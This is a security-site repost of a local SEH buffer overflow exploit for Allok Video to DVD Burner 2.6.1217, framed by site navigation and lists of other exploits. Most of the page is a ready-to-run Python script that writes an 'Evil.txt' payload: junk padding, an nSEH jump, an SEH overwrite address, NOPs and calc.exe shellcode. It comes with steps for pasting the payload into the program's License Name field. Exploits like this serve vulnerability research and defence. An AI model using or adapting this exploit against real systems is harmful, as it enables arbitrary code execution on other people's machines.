首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Allok Video to DVD Burner 2.6.1217 - Buffer Overflow (SEH) 来源：https://twitter.com/T3jv1l 作者：T3jv1l 发布时间：2018-04-25   ####################################################### # Exploit Title: Buffer Overflow(SEH)  on Allok Video to DVD Burner2.6.1217 # Date: 23.04.2018 # Exploit Author:T3jv1l # Vendor Homepage:http://www.alloksoft.com/ # Software: www.alloksoft.com/allok_dvdburner.exe # Category:Local # Contact:https://twitter.com/T3jv1l # Version: Allok Video to DVD Burner 2.6.1217 # Tested on: Windows 7 SP1 x86 # Hello subinacls ! # Method Corelan Coder : https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/ #############################################################   print""" #1.  Download and install the setup file #2.  Run this exploit code via python 2.7 #3.  A file "Evil.txt" will be created #4.  Copy the contents of the file (Evil.txt)and paste in the License Name field #5.  Click Register and BOMM !!!! """   import struct   file = open("Evil.txt","wb") buffer = 4000 junk = "A" * 780 nseh = "\x90\x90\xeb\x10" seh  = struct.pack("<L",0x10019A09) nop = "\x90" * 20   # Shellcode Calc.exe   buf = "" buf +="\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1" buf +="\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63" buf +="\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1" buf +="\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96" buf +="\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a" buf +="\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa" buf +="\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde" buf +="\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc" buf +="\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36" buf +="\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6" buf +="\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72" buf +="\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc" buf +="\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2" buf +="\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1" buf +="\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80" buf +="\xc4\xd9" exploit = junk + nseh + seh + nop + buf fillers = buffer - len(exploit) crush = exploit + "T" * fillers print "[+] Crush Me" file.write(crush) file.close()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·R 3.4.4 - Local Buffer Overflo ·Easy File Sharing Web Server 7 ·Ericsson-LG iPECS NMS A.1Ac - ·VMware Workstation 12.5.2 - Dr ·VLC Media Player/Kodi/PopcornT ·Chrome V8 JIT - 'AwaitedPromis ·Interspire Email Marketer < 6. ·Chrome V8 JIT - Arrow Function ·PRTG Network Monitor < 18.1.39 ·SickRage < v2018.03.09 - Clear ·Apache CouchDB 1.7.0 and 2.x b ·GitList 0.6 - Unauthenticated   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved